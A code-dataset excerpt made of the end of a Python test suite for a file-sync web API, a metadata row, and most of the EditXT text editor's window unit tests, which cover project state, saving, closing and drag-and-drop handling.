res = self.get(furl + '&reuse=1')
self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname))
# download for the first time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 200)
# download for the second time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 200)
def test_download_file_from_history(self):
with self.get_tmp_repo() as repo:
fname, _ = self.create_file(repo)
file_history_url = urljoin(repo.repo_url, 'history/') + \
'?p=/%s' % quote(fname)
res = self.get(file_history_url).json()
commit_id = res['commits'][0]['id']
self.assertEqual(len(commit_id), 40)
data = {
'p': fname,
'commit_id': commit_id,
}
query = '?' + urlencode(data)
res = self.get(repo.file_url + query)
self.assertRegexpMatches(res.text, r'"http(.*)/%s"' % quote(fname))
def test_get_file_detail(self):
with self.get_tmp_repo() as repo:
fname, _ = self.create_file(repo)
fdurl = repo.file_url + u'detail/?p=/%s' % quote(fname)
detail = self.get(fdurl).json()
self.assertIsNotNone(detail)
self.assertIsNotNone(detail['id'])
self.assertIsNotNone(detail['mtime'])
self.assertIsNotNone(detail['type'])
self.assertIsNotNone(detail['name'])
self.assertIsNotNone(detail['size'])
def test_get_file_history(self):
with self.get_tmp_repo() as repo:
fname, _ = self.create_file(repo)
fhurl = repo.file_url + u'history/?p=%s' % quote(fname)
history = self.get(fhurl).json()
for commit in history['commits']:
self.assertIsNotNone(commit['rev_file_size'])
#self.assertIsNotNone(commit['rev_file_id']) #allow null
self.assertIsNotNone(commit['ctime'])
self.assertIsNotNone(commit['creator_name'])
self.assertIsNotNone(commit['creator'])
self.assertIsNotNone(commit['root_id'])
#self.assertIsNotNone(commit['rev_renamed_old_path']) #allow null
#self.assertIsNotNone(commit['parent_id']) #allow null
self.assertIsNotNone(commit['new_merge'])
self.assertIsNotNone(commit['repo_id'])
self.assertIsNotNone(commit['desc'])
self.assertIsNotNone(commit['id'])
self.assertIsNotNone(commit['conflict'])
#self.assertIsNotNone(commit['second_parent_id']) #allow null
def test_get_upload_link(self):
with self.get_tmp_repo() as repo:
upload_url = urljoin(repo.repo_url, 'upload-link')
res = self.get(upload_url)
self.assertRegexpMatches(res.text, r'"http(.*)/upload-api/[^/]+"')
def test_get_update_link(self):
with self.get_tmp_repo() as repo:
update_url = urljoin(repo.repo_url, 'update-link')
res = self.get(update_url)
self.assertRegexpMatches(res.text, r'"http(.*)/update-api/[^/]+"')
# def test_upload_file(self):
# # XXX: requests has problems when post a file whose name contains
# # non-ascii data
# fname = 'file-upload-test %s.txt' % randstring()
# furl = self.test_file_url + '?p=/%s' % quote(fname)
# self.delete(furl)
# upload_url = self.test_repo_url + u'upload-link/'
# res = self.get(upload_url)
# upload_api_url = re.match(r'"(.*)"', res.text).group(1)
# files = {
# 'file': (fname, 'Some lines in this file'),
# 'parent_dir': '/',
# }
# res = self.post(upload_api_url, files=files)
# self.assertRegexpMatches(res.text, r'\w{40,40}')
# def test_update_file(self):
# fname = 'file-update-test %s.txt' % randstring()
# _, furl = self.create_file(fname=fname)
# update_url = self.test_repo_url + u'update-link/'
# res = self.get(update_url)
# update_api_url = re.match(r'"(.*)"', res.text).group(1)
# files = {
# 'file': ('filename', 'Updated content of this file'),
# 'target_file': '/test_update.c'
# }
# res = self.post(update_api_url, files=files)
# self.assertRegexpMatches(res.text, r'\w{40,40}')
def test_get_upload_blocks_link(self):
with self.get_tmp_repo() as repo:
upload_blks_url = urljoin(repo.repo_url, 'upload-blks-link')
res = self.get(upload_blks_url)
self.assertRegexpMatches(res.text, r'"http(.*)/upload-blks-api/[^/]+"')
def test_get_update_blocks_link(self):
with self.get_tmp_repo() as repo:
update_blks_url = urljoin(repo.repo_url, 'update-blks-link')
res = self.get(update_blks_url)
self.assertRegexpMatches(res.text, r'"http(.*)/update-blks-api/[^/]+"')
def test_only_list_dir(self):
with self.get_tmp_repo() as repo:
self.create_file(repo)
self.create_dir(repo)
dirents = self.get(repo.dir_url + '?t=d').json()
self.assertHasLen(dirents, 1)
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertIsNotNone(dirent['name'])
self.assertEqual(dirent['type'], 'dir')
def test_only_list_file(self):
with self.get_tmp_repo() as repo:
self.create_file(repo)
self.create_dir(repo)
dirents = self.get(repo.dir_url + '?t=f').json()
self.assertHasLen(dirents, 1)
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertIsNotNone(dirent['name'])
self.assertIsNotNone(dirent['size'])
self.assertEqual(dirent['type'], 'file')
def test_list_dir_and_file(self):
with self.get_tmp_repo() as repo:
self.create_file(repo)
self.create_dir(repo)
dirents = self.get(repo.dir_url).json()
self.assertHasLen(dirents, 2)
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertIsNotNone(dirent['name'])
self.assertIn(dirent['type'], ('file', 'dir'))
if dirent['type'] == 'file':
self.assertIsNotNone(dirent['size'])
def test_list_recursive_dir(self):
with self.get_tmp_repo() as repo:
# create test dir
data = {'operation': 'mkdir'}
dir_list = ['/1/', '/1/2/', '/1/2/3/', '/4/', '/4/5/', '/6/']
for dpath in dir_list:
durl = repo.get_dirpath_url(dpath)
self.post(durl, data=data, expected=201)
# get recursive dir
dirents = self.get(repo.dir_url + '?t=d&recursive=1').json()
self.assertHasLen(dirents, len(dir_list))
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertEqual(dirent['type'], 'dir')
full_path = posixpath.join(dirent['parent_dir'], dirent['name']) + '/'
self.assertIn(full_path, dir_list)
def test_remove_dir(self):
with self.get_tmp_repo() as repo:
_, durl = self.create_dir(repo)
res = self.delete(durl)
self.assertEqual(res.text, u'"success"')
self.get(durl, expected=404)
def test_download_dir(self):
with self.get_tmp_repo() as repo:
dpath, _ = self.create_dir(repo)
query = '?p=%s' % quote(dpath)
ddurl = urljoin(repo.dir_url, 'download') + query
res = self.get(ddurl)
self.assertRegexpMatches(res.text,
r'"http(.*)/files/[^/]+/%s"' % quote(dpath[1:]))
@pytest.mark.xfail
def test_create_dir_with_parents(self):
with self.get_tmp_repo() as repo:
path = u'/level1/level 2/level_3/目录4'
self.create_dir_with_parents(repo, path)
def create_dir_with_parents(self, repo, path):
data = {'operation': 'mkdir', 'create_parents': 'true'}
durl = repo.get_dirpath_url(path.encode('utf-8'))
self.post(durl, data=data, expected=201)
curpath = ''
# check the parents are created along the way
parts = path.split('/')
for i, name in enumerate(parts):
curpath += '/' + name
url = repo.get_dirpath_url(curpath.encode('utf-8'))
if i < len(parts) - 1:
assert self.get(url).json()[0]['name'] == parts[i+1]
else:
assert self.get(url).json() == []
| apache-2.0 | -1,825,122,253,764,284,400 | 39.809836 | 87 | 0.536515 | false | 3.702261 | true | false | false |
editxt/editxt | editxt/test/test_window.py | 1 | 57101 | # -*- coding: utf-8 -*-
# EditXT
# Copyright 2007-2013 Daniel Miller <[email protected]>
#
# This file is part of EditXT, a programmer's text editor for Mac OS X,
# which can be found at http://editxt.org/.
#
# EditXT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EditXT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EditXT. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import re
from collections import defaultdict
from functools import partial
import AppKit as ak
import Foundation as fn
from mocker import Mocker, ANY
from testil import eq_
import editxt.constants as const
from editxt.window import WindowController, Window
from editxt.document import DocumentController, TextDocument
from editxt.editor import Editor
from editxt.platform.kvo import proxy_target
from editxt.project import Project
from editxt.test.noseplugins import slow_skip
from editxt.util import representedObject
from editxt.test.util import (do_method_pass_through, gentest, make_dirty,
TestConfig, Regex, replattr, tempdir, test_app)
import editxt.window as mod
log = logging.getLogger(__name__)
# log.debug("""TODO test
# Window.iter_dropped_paths
# Window.iter_dropped_id_list
# """)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Window tests
# log.debug("""TODO implement
# """)
def test_WindowConroller__init__():
@test_app
def test(app, args):
ed = Window(app, **args)
assert len(ed.projects) == 0
assert len(ed.recent) == 0
assert ed.wc is not None
if args:
assert ed.state is args["state"]
eq_(ed.command.window, ed)
c = TestConfig()
yield test, {}
yield test, {"state": "<state data>"}
def test_window_did_load():
@test_app
def test(app, state):
import editxt.platform.views as cells
from editxt.window import BUTTON_STATE_SELECTED
from editxt.util import load_image
m = Mocker()
ed = Window(app, state)
wc = ed.wc = m.mock(WindowController)
_setstate = m.method(ed._setstate)
new_project = m.method(ed.new_project)
load_image_cache = {}
_load_image = m.mock()
def load_image(name):
try:
img = load_image_cache[name]
_load_image(name)
except KeyError:
img = load_image_cache[name] = m.mock()
_load_image(name) >> img
return img
wc.docsView.setRefusesFirstResponder_(True)
wc.docsView.default_menu = ed.menu
wc.docsView.registerForDraggedTypes_(
[const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType])
wc.plusButton.setRefusesFirstResponder_(True)
wc.plusButton.setImage_(load_image(const.PLUS_BUTTON_IMAGE))
wc.propsViewButton.setRefusesFirstResponder_(True)
wc.propsViewButton.setImage_(load_image(const.PROPS_DOWN_BUTTON_IMAGE))
wc.propsViewButton.setAlternateImage_(load_image(const.PROPS_UP_BUTTON_IMAGE))
_setstate(state)
if state:
ed.projects = [m.mock(Project)]
else:
new_project()
with replattr(mod, 'load_image', load_image), m:
ed.window_did_load()
eq_(len(ed.projects), (1 if state else 0))
assert ed._state is None
#assert ed.window_settings == "<settings>"
yield test, None
yield test, "<serial data>"
def test__setstate():
from itertools import count
from editxt.util import RecentItemStack
keygen = count()
class Item(dict):
def __init__(self, **kwargs):
self["id"] = next(keygen)
self.update(kwargs)
@property
def proxy(self):
return self
@property
def _target(self):
return self
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
@test_app
def test(app, data):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ed.suspend_recent_updates = m.method(ed.suspend_recent_updates)
project_class = m.replace(mod, 'Project')
ed.recent = m.mock(RecentItemStack)
ws = m.property(ed, 'window_settings')
projects = []
if data:
for serial in data.get("projects", data.get("project_serials", [])):
proj = project_class(ed, serial=serial) >> Item()
projects.append(proj)
for pi, di in data.get("recent_items", []):
if pi < 1:
while len(ed.projects) <= pi:
docs = []
proj = Item(editors=docs)
projects.append(proj)
ed.projects.append(proj)
proj = ed.projects[pi]
if di == "<project>":
ed.recent.push(proj.id)
else:
if di < 2:
while len(proj.editors) <= di:
proj.editors.append(Item())
ed.recent.push(docs[di].id)
@mod.contextmanager
def focus():
yield
ed.suspend_recent_updates() >> focus()
if 'window_settings' in data:
ws.value = data['window_settings']
with m:
ed._setstate(data)
eq_(list(ed.projects), projects)
yield test, None
yield test, dict()
yield test, dict(projects=["<serial>"])
yield test, dict(project_serials=["<serial>"]) # legacy
yield test, dict(recent_items=[[0, 2], [0, 0], [0, "<project>"], [0, 1], [1, 0]])
yield test, dict(window_settings="<window_settings>")
def test_state():
@test_app
def test(app, c):
m = Mocker()
def exists(path):
return True
ed = Window(app)
ed.projects = projs = []
ed.recent = c.recent
m.property(ed, 'window_settings').value >> '<settings>'
psets = []
items = {}
for i, p in enumerate(c.projs):
proj = m.mock(Project)
projs.append(proj)
pserial = proj.serialize() >> ("proj_%i" % p.id)
psets.append(pserial)
# setup for recent items
proj.id >> p.id
items[p.id] = [i, "<project>"]
docs = proj.editors >> []
for j, d in enumerate(p.docs):
editor = m.mock(Editor)
docs.append(editor)
editor.id >> d
items[d] = [i, j]
rits = [items[ri] for ri in c.recent if ri in items]
data = {'window_settings': '<settings>'}
if psets:
data["projects"] = psets
if rits:
data["recent_items"] = rits
with replattr(os.path, 'exists', exists), m:
eq_(ed.state, data)
c = TestConfig(window='<settings>')
p = lambda ident, docs=(), **kw:TestConfig(id=ident, docs=docs, **kw)
yield test, c(projs=[], recent=[])
yield test, c(projs=[p(42)], recent=[42])
yield test, c(projs=[p(42, docs=[35])], recent=[35, 42])
yield test, c(projs=[p(42, docs=[-32, 35])], recent=[35, 42])
def test_discard():
from editxt.util import RecentItemStack
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
(ed.wc.selected_items << []).count(2)
ed.projects = projs = []
ed.recent = m.mock(RecentItemStack)
app = m.replace(ed, 'app')
new_current_editor = None
cv = m.property(ed, "current_editor")
@mod.contextmanager
def suspend():
yield
m.method(ed.suspend_recent_updates)(True) >> suspend()
lookup = {}
for p in c.hier:
proj = m.mock(Project)
proj.id >> p.id
docs = []
for d in p.docs:
dv = m.mock(Editor)
dv.id >> d.id
docs.append(dv)
if c.id in (p.id, d.id):
ed.recent.discard(d.id)
dv.project >> proj
dv.close()
else:
lookup[d.id] = dv
proj.editors >> docs
if p.id == c.id:
ed.recent.discard(p.id)
proj.close()
else:
lookup[p.id] = proj
projs.append(proj)
item = m.mock()
item.id >> c.id
with m:
ed.discard(item)
item = lambda i, **kw: TestConfig(id=i, **kw)
c = TestConfig(id=2, recent=[], hier=[ # hierarchy of items in the window
item(0, docs=[item(1), item(2), item(3)]),
item(4, docs=[item(5), item(6), item(7)]),
item(8, docs=[item(9), item(12), item(13)]),
])
yield test, c(id=42, hier=[])
yield test, c(id=42)
yield test, c
yield test, c(recent=[0, 10])
yield test, c(recent=[10, 0])
yield test, c(recent=[20, 2])
yield test, c(recent=[2, 20])
yield test, c(id=0, recent=[0, 10, 2, 1, 3, 5, 7])
def test_get_current_editor():
with test_app() as app:
ed = Window(app)
obj = object()
ed._current_editor = obj
eq_(ed.current_editor, obj)
def test_set_current_editor():
from editxt.util import RecentItemStack
@test_app
def test(app, c):
m = Mocker()
window = Window(app)
wc = window.wc = m.mock(WindowController)
insert_items = m.method(window.insert_items)
window.recent = m.mock(RecentItemStack)
find_project_with_editor = m.method(window.find_project_with_editor)
editor = (None if c.editor_class is None else m.mock(c.editor_class))
if c.editor_class is None:
assert editor is None, editor
wc.setup_current_editor(None)
wc.selected_items = []
else:
wc.is_current_view(editor.main_view >> "view") >> c.editor_is_current
if c.editor_is_current:
editor.focus()
else:
window.recent.push(editor.id >> m.mock())
setup = c.editor_class is Editor and not c.view_is_main
wc.setup_current_editor(editor) >> setup
if setup:
if c.proj_is_none:
find_project_with_editor(editor) >> None
insert_items([editor])
else:
find_project_with_editor(editor) >> m.mock(Project)
wc.selected_items >> []
wc.selected_items = [editor]
with m:
window.current_editor = editor
c = TestConfig(editor_is_current=False, editor_class=Editor)
yield test, c(editor_is_current=True)
yield test, c(editor_class=None)
for is_main in (True, False):
for no_project in (True, False):
yield test, c(view_is_main=is_main, proj_is_none=no_project)
yield test, c(editor_class=Project)
yield test, c(editor_class=Project, editor_is_current=True)
def test_selected_editor_changed():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = wc = m.mock(WindowController)
cv = m.property(ed, "current_editor")
sel = [m.mock() for x in range(c.numsel)]
wc.selected_items >> sel
if sel:
if c.is_current_selected:
cv.value >> sel[0]
else:
cv.value >> m.mock()
cv.value = sel[0]
with m:
ed.selected_editor_changed()
c = TestConfig(numsel=0)
yield test, c
for ics in (True, False):
yield test, c(numsel=1, is_current_selected=ics)
yield test, c(numsel=5, is_current_selected=ics)
def test_on_dirty_status_changed():
calls = []
def callback(editor, dirty):
calls.append(dirty)
with test_app("editor") as app:
window = app.windows[0]
editor = window.projects[0].editors[0]
with replattr(window.wc, "on_dirty_status_changed", callback, sigcheck=False):
eq_(calls, [])
make_dirty(editor.document)
eq_(calls, [True])
assert window.is_dirty
editor.undo_manager.savepoint()
eq_(calls, [True, False])
assert not window.is_dirty
def test_suspend_recent_updates():
def test(c):
with test_app(c.init) as app:
window = app.windows[0]
editor = window.current_editor
real = window.recent
assert real is not None
with window.suspend_recent_updates():
assert window.recent is not real
window.recent.push(editor.id + 42)
if c.remove:
item = test_app(app).get(c.remove)
if isinstance(item, Editor):
item.project.editors.remove(item)
else:
item.window.projects.remove(item)
eq_(test_app(app).state, c.final)
c = TestConfig(remove=None)
yield test, c(init="editor*", final="window project editor*")
yield test, c(init="editor(1)* editor(2)",
final="window project editor(1)* editor(2)")
yield test, c(init="editor(1)* editor(2)", remove="editor(1)",
final="window project editor(2)*")
yield test, c(init="editor(1)* editor(2)", remove="editor(2)",
final="window project editor(1)*")
yield test, c(init="project(a) editor(1)* project(b) editor(2)",
final="window project(b) editor(2)*", remove="project(a)")
def test_open_documents():
def test(cfg, prompt, after):
with test_app(cfg) as app:
window = app.windows[0]
window.open_documents()
eq_(window.wc.prompts, prompt)
eq_(test_app(app).state, "window project" + after)
yield test, "window", ["open ~"], "[0] editor[~/file.txt 1]*"
yield test, "project*", ["open ~"], " editor[~/file.txt 0]*"
yield test, "project* editor", ["open ~"], " editor editor[~/file.txt 0]*"
yield test, "project editor*", ["open ~"], " editor editor[~/file.txt 0]*"
yield test, "editor(/dir/doc.txt)*", ["open /dir"], " editor(/dir/doc.txt) editor[/dir/file.txt 0]*"
yield test, "editor(/cancel/doc.txt)*", ["open /cancel"], " editor(/cancel/doc.txt)*"
def test_save_methods():
def test(cfg, save, prompt=False):
with test_app(cfg) as app:
m = Mocker()
window = app.windows[0]
current = window.current_editor
if save is not None:
method = m.method(current.save)
if save:
method(prompt=prompt)
with m:
(window.save_as if prompt else window.save)()
yield test, "window", None
yield test, "project*", False
yield test, "project* editor", False
yield test, "editor*", True
yield test, "editor*", True, True
def test_reload_current_document():
def test(cfg, reverted=False):
with test_app(cfg) as app:
m = Mocker()
window = app.windows[0]
current = window.current_editor
if reverted:
m.method(current.document.reload_document)()
else:
assert getattr(current, "document", None) is None, repr(current)
with m:
window.reload_current_document()
yield test, "window"
yield test, "project*"
yield test, "project* editor"
yield test, "project editor*", True
def test_save_document_as():
assert hasattr(Window, "save_document_as")
def test_prompt_to_overwrite():
assert hasattr(Window, "prompt_to_overwrite")
def test__directory_and_filename():
def test(path, directory, name, mkdir=False):
if os.path.isabs(path):
path = path.lstrip(os.path.sep)
assert not os.path.isabs(path), path
with tempdir() as tmp:
path = os.path.join(tmp, path)
if mkdir:
assert not os.path.exists(os.path.dirname(path)), path
os.mkdir(os.path.dirname(path))
result = Window._directory_and_filename(path)
result = (result[0][len(tmp):] or "/"), result[1]
else:
result = Window._directory_and_filename(path)
eq_(result, (directory, name))
yield test, "file.txt", None, "file.txt"
yield test, "/file.txt", "/", "file.txt"
yield test, "somedir/file.txt", None, "file.txt"
yield test, "/somedir/file.txt", "/", "file.txt"
yield test, "/somedir/file.txt", "/somedir", "file.txt", True
def test_new_project():
with test_app() as app:
m = Mocker()
ed = Window(app)
m.property(ed, "current_editor").value = ANY
m.method(Project.create_editor)() >> m.mock()
with m:
result = ed.new_project()
assert result in ed.projects, ed.projects
eq_(list(result.editors), [])
eq_(result.window, ed)
def test_toggle_properties_pane():
slow_skip()
@test_app
def test(app, c):
m = Mocker()
nsanim = m.replace(ak, 'NSViewAnimation')
nsdict = m.replace(fn, 'NSDictionary')
nsval = m.replace(fn, 'NSValue')
nsarr = m.replace(fn, 'NSArray')
ed = Window(app)
ed.wc = wc = m.mock(WindowController)
tree_view = m.mock(ak.NSScrollView); (wc.docsScrollview << tree_view).count(2)
prop_view = m.mock(ak.NSView); (wc.propsView << prop_view).count(2, 3)
tree_rect = tree_view.frame() >> m.mock(fn.NSRect)
prop_rect = prop_view.frame() >> m.mock(fn.NSRect)
wc.propsViewButton.state() >> (ak.NSOnState if c.is_on else ak.NSOffState)
if c.is_on:
prop_rect.size.height >> 10
tree_rect.size.height = (tree_rect.size.height >> 20) + 9
tree_rect.origin.y = prop_rect.origin.y >> 4
prop_rect.size.height = 0.0
else:
tree_rect.size.height = (tree_rect.size.height >> 216.0) - 115.0
if c.mid_resize:
(prop_rect.size.height << 100.0).count(2)
tree_rect.size.height = (tree_rect.size.height >> 100.0) + 99.0
else:
prop_rect.size.height >> 0
tree_rect.origin.y = (prop_rect.origin.y >> 0) + 115.0
prop_rect.size.height = 116.0
prop_view.setHidden_(False)
resize_tree = nsdict.dictionaryWithObjectsAndKeys_(
tree_view, ak.NSViewAnimationTargetKey,
(nsval.valueWithRect_(tree_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey,
None,
) >> m.mock(fn.NSDictionary)
resize_props = nsdict.dictionaryWithObjectsAndKeys_(
prop_view, ak.NSViewAnimationTargetKey,
(nsval.valueWithRect_(prop_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey,
None,
) >> m.mock(fn.NSDictionary)
anims = nsarr.arrayWithObjects_(resize_tree, resize_props, None) >> m.mock(fn.NSArray)
anim = nsanim.alloc() >> m.mock(ak.NSViewAnimation)
anim.initWithViewAnimations_(anims) >> anim
anim.setDuration_(0.25)
anim.startAnimation()
with m:
ed.toggle_properties_pane()
c = TestConfig()
yield test, c(is_on=True)
yield test, c(is_on=False, mid_resize=True)
yield test, c(is_on=False, mid_resize=False)
def test_find_project_with_editor():
with test_app() as app:
ed = Window(app)
doc = app.document_with_path(None)
proj = Project(ed)
dv = Editor(proj, document=doc)
proj.insert_items([dv])
assert dv.document is doc
ed.projects.append(proj)
eq_(ed.find_project_with_editor(dv), proj)
dv = object()
eq_(ed.find_project_with_editor(dv), None)
def test_find_project_with_path():
@test_app
def test(app, c):
m = Mocker()
def exists(path):
return True
def samefile(f1, f2):
eq_(f2, c.path)
return f1 == f2
ed = Window(app)
ed.projects = projects = []
found_proj = None
for path in c.paths:
proj = m.mock(Project)
projects.append(proj)
if found_proj is None:
proj.file_path >> path
if path is None:
continue
if path == c.path:
found_proj = proj
with replattr(
(os.path, 'exists', exists),
(os.path, 'samefile', samefile),
), m:
result = ed.find_project_with_path(c.path)
eq_(result, found_proj)
def path(i):
return "/path/to/proj_%s.%s" % (i, const.PROJECT_EXT)
c = TestConfig(path=path(1), paths=[])
yield test, c
yield test, c(paths=[None])
yield test, c(paths=[path(1)])
yield test, c(paths=[path(0), path(1)])
yield test, c(paths=[path(0), path(1), path(2), path(1)])
def test_get_current_project():
def test(cfg, index, create=False, after=None):
args = {"create": True} if create else {}
with test_app(cfg) as app:
window = app.windows[0]
result = window.get_current_project(**args)
eq_(test_app(app).state, after or cfg)
if index is None:
eq_(result, None)
else:
eq_(result, window.projects[index])
yield test, "window", None
yield test, "window", 0, True, "window project[0]"
yield test, "window project", 0
yield test, "window project* project", 0
yield test, "window project project*", 1
yield test, "window project -project*", 1
yield test, "window project project editor*", 1
yield test, "window project editor project editor", 0
yield test, "window -project editor project editor", 1
def test_Window_iter_editors_of_document():
DOC = "the document we're looking for"
@test_app
def test(app, config, total_editors):
ed = Window(app)
m = Mocker()
editors = []
doc = m.mock(TextDocument)
ed.projects = projs = []
for proj_has_editor in config:
proj = m.mock(Project)
projs.append(proj)
dv = (m.mock(Editor) if proj_has_editor else None)
proj.iter_editors_of_document(doc) >> ([] if dv is None else [dv])
if dv is not None:
editors.append(dv)
with m:
result = list(ed.iter_editors_of_document(doc))
eq_(result, editors)
eq_(len(result), total_editors)
yield test, [], 0
yield test, [False], 0
yield test, [True], 1
yield test, [False, True, True, False, True], 3
def test_tool_tip_for_item():
def test(doctype, null_path):
m = Mocker()
view = m.mock(ak.NSOutlineView)
if doctype is not None:
tip = "test_tip"
doc = m.mock(doctype)
(doc.file_path << (None if null_path else tip)).count(1, 2)
else:
tip = doc = None
item = m.mock()
view.realItemForOpaqueItem_(item) >> doc
with m, test_app() as app:
ed = Window(app)
result_tip = ed.tooltip_for_item(view, item)
eq_(result_tip, (None if null_path else tip))
for doctype in (TextDocument, Project, None):
yield test, doctype, True
yield test, doctype, False
def test_should_edit_item():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
item = m.mock()
col = m.mock(ak.NSTableColumn)
if (col.isEditable() >> c.col_is_editable):
obj = m.mock(Project if c.item_is_project else Editor)
if c.item_is_project:
obj.can_rename() >> c.can_rename
representedObject(item) >> obj
with m:
result = ed.should_edit_item(col, item)
eq_(result, c.result)
c = TestConfig(col_is_editable=True, item_is_project=True, result=False)
yield test, c(col_is_editable=False)
yield test, c(item_is_project=False)
yield test, c(can_rename=False)
yield test, c(can_rename=True, result=True)
def test_copy_path():
pasteboard = mod.Pasteboard()
@gentest
def test(index, text, config="editor(a) editor(b)*"):
with test_app(config) as app:
window = app.windows[0]
item = [editor for project in window.projects
for editor in project.editors][index]
window.copy_path(item)
eq_(pasteboard.text, text)
yield test(0, "a")
yield test(1, "b")
yield test(0, "a\nc", config="editor(a)* editor(b) editor(c)*")
yield test(1, "b", config="editor(a)* editor(b) editor(c)*")
def test_close_item():
@gentest
def test(index=1, expected="editor(a)*", config="editor(a) editor(b)*"):
with test_app(config) as app:
window = app.windows[0]
item = [editor for project in window.projects
for editor in project.editors][index]
window.close_item(item)
eq_(test_app(app).state, ("window project " + expected).strip())
yield test()
yield test(0, "editor(b)*")
yield test(0, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*")
yield test(2, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*")
yield test(config="editor(a)* editor(b) editor(c)*", expected="editor(a)* editor(c)*")
def test_window_did_become_key():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
win = m.mock(ak.NSWindowController)
cv = m.property(ed, "current_editor")
dv = cv.value >> (m.mock(c.editor_type) if c.has_current else None)
if c.has_current and c.editor_type is Editor:
dv.document.check_for_external_changes(win)
with m:
ed.window_did_become_key(win)
c = TestConfig(has_current=False, editor_type=Editor)
yield test, c
yield test, c(has_current=True)
yield test, c(has_current=True, editor_type=Project)
def test_Window_should_close():
@gentest
def test(config, prompts=[], should_close=False, close=True):
calls = []
def do_close():
calls.append("close")
with test_app(config) as app:
window = app.windows[0]
for win in app.windows:
for project in win.projects:
for editor in project.editors:
if "/dirty.save" in editor.file_path:
test_app(app).set_content(editor)
if "dirty" in editor.file_path:
make_dirty(editor.document)
result = window.should_close(do_close)
eq_(window.wc.prompts, prompts)
eq_(calls, ["close"] if close and not should_close else [])
eq_(result, should_close)
yield test("editor", should_close=True)
yield test("editor(dirty)", ["close dirty"], close=False)
yield test("editor(dirty.save)", ["close dirty.save", "save dirty.save"], close=False) # cancel save
yield test("editor(/dirty.save)", ["close dirty.save"])
yield test("editor(/dirty.missing)", ["close dirty.missing"], close=False)
yield test("editor(/dirty.dont_save)", ["close dirty.dont_save"])
yield test("editor(dirty) window project editor(dirty)", should_close=True)
def test_window_will_close():
@test_app
def test(app, window_settings_loaded, num_projects):
m = Mocker()
ed = Window(app)
ed.window_settings_loaded = window_settings_loaded
app = m.replace(ed, 'app')
with m.order():
app.discard_window(ed)
with m:
ed.window_will_close()
yield test, True, 0
yield test, False, 0
yield test, False, 1
yield test, False, 3
def test_get_window_settings():
@test_app
def test(app, c):
settings = dict(
frame_string="<frame string>",
splitter_pos="<splitter_pos>",
properties_hidden=c.props_hidden,
)
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ed.wc.frame_string >> settings["frame_string"]
ed.wc.splitter_pos >> settings["splitter_pos"]
ed.wc.properties_hidden >> (ak.NSOnState if c.props_hidden else ak.NSOffState)
with m:
result = ed.window_settings
eq_(result, settings)
c = TestConfig()
yield test, c(props_hidden=True)
yield test, c(props_hidden=False)
def test_set_window_settings_with_null_settings():
with test_app() as app:
ed = Window(app)
class FakeWindowController(TestConfig):
def __setattr__(self, name, value):
self.__dict__[name] = value
ed.wc = FakeWindowController()
ed.window_settings = {}
eq_(ed.wc, FakeWindowController(properties_hidden=False))
def test_set_window_settings():
with test_app() as app:
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
fs = "<test frame string>"
sp = "<test splitter position>"
ed.wc.frame_string = fs
ed.wc.splitter_pos = sp
ed.wc.properties_hidden = True
with m:
ed.window_settings = dict(frame_string=fs, splitter_pos=sp, properties_hidden=True)
def test_close():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = wc = m.mock(WindowController)
ed.projects = []
ed.window_settings_loaded = c.ws_loaded
for x in range(3):
proj = m.mock(Project)
proj.close()
ed.projects.append(proj)
#wc.docsController.setContent_(None)
with m:
if not c.wc_is_none:
assert ed.wc is not None
assert list(ed.projects)
ed.close()
assert not ed.window_settings_loaded
#assert ed.wc is None
#assert not list(ed.projects)
c = TestConfig(wc_is_none=False)
yield test, c(wc_is_none=True, ws_loaded=False)
for wsl in (True, False):
yield test, c(ws_loaded=wsl)
# drag/drop tests ~~~~~~~~~~~~~~~~~~~~~~~
def test_is_project_drag():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list)
pb = m.mock(ak.NSPasteboard)
result_items = []
info = m.mock() #NSDraggingInfo
items = []
pb = info.draggingPasteboard() >> m.mock(ak.NSPasteboard)
pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type
if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE:
id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock()
ed.iter_dropped_id_list(id_list) >> items
factories = dict(
p=(lambda:m.mock(Project)),
d=(lambda:m.mock(Editor)),
)
elif c.accepted_type == ak.NSFilenamesPboardType:
pb.propertyListForType_(ak.NSFilenamesPboardType) >> items
factories = dict(
p=(lambda:"/path/to/project." + const.PROJECT_EXT),
d=(lambda:"/path/to/document.txt"),
)
else:
factories = None
if factories is not None:
for it in c.items:
items.append(factories[it]())
with m:
result = ed.is_project_drag(info)
eq_(result, c.result)
c = TestConfig(result=False)
